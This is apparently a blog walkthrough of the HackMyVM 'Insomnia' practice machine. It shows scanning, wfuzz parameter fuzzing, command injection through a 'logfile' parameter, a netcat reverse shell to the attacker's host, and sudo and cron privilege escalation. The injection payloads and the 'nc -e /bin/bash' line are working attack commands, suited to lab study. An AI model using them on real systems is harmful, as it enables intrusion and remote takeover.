HackMyVm Insomnia Walkthrough (RCE)

Machines can be download here.



Nmap scan ports.

图片.png


Gobuster scan files and folders.

图片.png


Visit main page, get chat window.

图片.png


Visit chat.txt, chat history is here.

图片.png


Visit administration.php, get error.

图片.png


There should be some parameter for administration.php.

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt   'http://192.168.56.56:8080/administration.php?FUZZ=test'

图片.png


Exclude 65ch length response.

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hh 65  'http://192.168.56.56:8080/administration.php?FUZZ=test'

图片.png


curl http://192.168.56.56:8080/administration.php\?logfile\=administration.php\;id

Check chat.txt.

图片.png


There is RCE. Get reverse shell now.

curl http://192.168.56.56:8080/administration.php\?logfile\=administration.php\;nc%20192.168.56.100%201234%20-e%20/bin/bash

图片.png


sudo -l

图片.png


cat /var/www/html/start.sh

图片.png


echo bash >/var/www/html/start.sh
sudo -u julia /bin/bash /var/www/html/start.sh

图片.png


Check crontab.

图片.png


Add reverse shell code into check.sh, and wait.

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2022年5月    »
1
2345678
9101112131415
16171819202122
23242526272829
3031
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2